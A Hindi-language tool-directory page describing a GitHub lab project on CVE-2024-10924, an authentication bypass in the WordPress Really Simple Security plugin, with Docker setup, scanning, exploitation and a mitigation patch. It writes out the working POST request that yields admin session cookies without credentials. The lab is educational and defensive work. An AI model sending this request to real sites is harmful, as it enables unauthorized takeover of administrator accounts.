Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bodoinon/cve-2024-10924
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

WordPress Really Simple Security में CVE-2024-10924, एक प्रमाणीकरण बाईपास, के शोषण और शमन को प्रदर्शित करता है, स्वचालित Python शोषण, मैनुअल Burp Suite चरणों और पैच सत्यापन के साथ।

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10924 - Really Simple Security में प्रमाणीकरण उपेक्षा

अवलोकन यह परियोजना CVE-2024-10924 के शोषण और शमन को प्रदर्शित करती है, जो WordPress "Really Simple Security" प्लगइन में एक गंभीर प्रमाणीकरण उपेक्षा भेद्यता है।

चरण 1: पर्यावरण सेटअप

भेद्य WordPress वातावरण प्रारंभ करें: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

कंटेनर चल रहे हैं यह सत्यापित करें: docker ps

WordPress एक्सेस करें: http://localhost:1337

आवश्यक उपकरण:

  • Python 3.x (स्वचालित शोषण के लिए)
  • Burp Suite (मैन्युअल शोषण के लिए)
  • GVM (Greenbone Vulnerability Management) स्कैनिंग के लिए

चरण 2: भेद्यता स्कैन

लक्ष्य के विरुद्ध GVM स्कैन चलाएँ:

  • Target: http://localhost:1337
  • अपेक्षित परिणाम: CVE-2024-10924 का पता लगा
  • गंभीरता: गंभीर (CVSS 9.8)
  • भेद्य एंडपॉइंट: /reallysimplessl/v1/two_fa/skip_onboarding

चरण 3: शोषण

विधि A - स्वचालित Python शोषण: python exploit.py

विधि B - मैन्युअल Burp Suite:

  1. http://localhost:1337 पर ट्रैफ़िक इंटरसेप्ट करें

  2. POST अनुरोध भेजें: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. एडमिन सत्र वाले Set-Cookie हेडर के साथ प्रतिक्रिया देखें

अपेक्षित परिणाम:

  • Status: 200 OK
  • एडमिन सत्र कुकीज़ लौटाई गईं
  • बिना क्रेडेंशियल के सफल उपेक्षा

चरण 4: शमन

भेद्य एंडपॉइंट को अवरुद्ध करने के लिए पैच लागू करें: .\patch.ps1

यह क्या करता है:

  • mitigation.php को कंटेनर के /wp-content/mu-plugins/ में कॉपी करता है
  • भेद्य REST API एंडपॉइंट पर सभी अनुरोधों को अवरुद्ध करता है
  • शोषण प्रयासों के लिए 403 Forbidden लौटाता है

चरण 5: सत्यापन

शोषण पुनः चलाएँ (विधि A या B): python exploit.py

शमन के बाद अपेक्षित परिणाम:

  • Status: 403 Forbidden
  • कोई एडमिन कुकीज़ नहीं लौटाई गईं
  • हमला सफलतापूर्वक अवरुद्ध हुआ

अतिरिक्त नोट्स

पर्यावरण को रोकने के लिए: docker-compose down

कंटेनर लॉग देखने के लिए: docker-compose logs -f

WordPress एडमिन को वैध रूप से एक्सेस करने के लिए: http://localhost:1337/wp-admin (क्रेडेंशियल के लिए docker-compose.yml जाँचें)

टूल डाउनलोड करें